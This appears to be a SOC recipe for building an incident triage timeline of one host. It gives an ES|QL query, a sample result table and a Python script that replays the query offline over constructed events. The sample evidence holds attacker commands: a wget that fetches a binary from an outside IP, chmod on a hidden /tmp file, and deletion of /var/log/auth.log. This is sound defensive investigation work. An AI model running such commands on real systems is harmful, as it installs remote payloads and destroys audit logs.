Triage timeline of a compromised host
Chronological multi-category reconstruction (auth, process, network, files) over an incident window, with a single detail field built with COALESCE so the attack can be read from start to finish.
Requirements
Elasticsearch 8.12+, multi-source ECS logs
Query (ES|QL)
FROM "logs-*"
| WHERE host.name == "srv-app-02"
    AND @timestamp >= "2026-06-10T02:00:00Z"
    AND @timestamp < "2026-06-10T04:30:00Z"
    AND event.category IN ("authentication", "process", "network", "file")
| EVAL detail = COALESCE(
    process.command_line,
    file.path,
    CONCAT(destination.ip, ":", TO_STRING(destination.port)),
    event.action)
| KEEP @timestamp, event.category, event.action, user.name, detail
| SORT @timestamp ASC
| LIMIT 200

Result
@timestamp               | event.category | event.action | user.name | detail
-------------------------+----------------+--------------+-----------+------------------------------------
2026-06-10T02:07:14.220Z | authentication | ssh-login    | deploy    | ssh-login
2026-06-10T02:08:02.114Z | process        | exec         | deploy    | sudo su -
2026-06-10T02:09:41.872Z | process        | exec         | root      | wget hxxp://198.51.100.23/agent.bin
2026-06-10T02:09:58.330Z | file           | creation     | root      | /tmp/.cache/agent.bin
2026-06-10T02:10:03.001Z | process        | exec         | root      | chmod +x /tmp/.cache/agent.bin
2026-06-10T02:10:11.448Z | network        | connection   | root      | 198.51.100.23:443
2026-06-10T02:41:09.112Z | file           | deletion     | root      | /var/log/auth.log
2026-06-10T03:55:37.604Z | network        | connection   | root      | 10.2.0.14:5432
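The same reconstruction can be run offline over an NDJSON export of ECS events when the cluster is unavailable or the evidence must be re-checked outside it. This is an added example, not code from the page: it mirrors the query's host, window and category filters and the COALESCE precedence for detail, assuming that CONCAT with a missing destination.ip or destination.port is null (so the row falls back to event.action); the sample events are constructed.

```python
from datetime import datetime

# Constructed sample ECS events (dotted keys), same host and window as the query.
SAMPLE_EVENTS = [
    {"@timestamp": "2026-06-10T02:09:41.872Z", "host.name": "srv-app-02", "event.category": "process",
     "event.action": "exec", "user.name": "root", "process.command_line": "wget hxxp://198.51.100.23/agent.bin"},
    {"@timestamp": "2026-06-10T02:07:14.220Z", "host.name": "srv-app-02", "event.category": "authentication",
     "event.action": "ssh-login", "user.name": "deploy"},
    {"@timestamp": "2026-06-10T02:10:11.448Z", "host.name": "srv-app-02", "event.category": "network",
     "event.action": "connection", "user.name": "root", "destination.ip": "198.51.100.23", "destination.port": 443},
    {"@timestamp": "2026-06-10T02:41:09.112Z", "host.name": "srv-app-02", "event.category": "file",
     "event.action": "deletion", "user.name": "root", "file.path": "/var/log/auth.log"},
    # No destination.* fields: CONCAT would be null, so detail falls back to event.action.
    {"@timestamp": "2026-06-10T02:30:00.000Z", "host.name": "srv-app-02", "event.category": "network",
     "event.action": "connection", "user.name": "root"},
    # Outside the incident window: must be filtered out.
    {"@timestamp": "2026-06-10T05:00:00.000Z", "host.name": "srv-app-02", "event.category": "process",
     "event.action": "exec", "user.name": "root", "process.command_line": "ls"},
]
CATEGORIES = {"authentication", "process", "network", "file"}

def parse_ts(value):
    # ECS timestamps are ISO 8601 in UTC; rewrite the 'Z' suffix so older Pythons can parse it.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))

def detail_of(ev):
    # Same precedence as COALESCE(process.command_line, file.path, CONCAT(ip, ":", port), event.action).
    if ev.get("process.command_line") is not None:
        return ev["process.command_line"]
    if ev.get("file.path") is not None:
        return ev["file.path"]
    ip, port = ev.get("destination.ip"), ev.get("destination.port")
    if ip is not None and port is not None:   # CONCAT with a null argument is treated as null
        return f"{ip}:{port}"
    return ev.get("event.action")

def build_timeline(events, host, start, end, limit=200):
    # WHERE host.name == host AND start <= @timestamp < end AND category IN (...); SORT ASC; LIMIT.
    t0, t1 = parse_ts(start), parse_ts(end)
    rows = [(ev["@timestamp"], ev["event.category"], ev["event.action"], ev.get("user.name"), detail_of(ev))
            for ev in events
            if ev.get("host.name") == host and ev.get("event.category") in CATEGORIES
            and t0 <= parse_ts(ev["@timestamp"]) < t1]
    rows.sort(key=lambda r: parse_ts(r[0]))
    return rows[:limit]

if __name__ == "__main__":
    for row in build_timeline(SAMPLE_EVENTS, "srv-app-02", "2026-06-10T02:00:00Z", "2026-06-10T04:30:00Z"):
        print(" | ".join(str(col) for col in row))
```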
Tags: SOC, Investigation, Timeline, Triage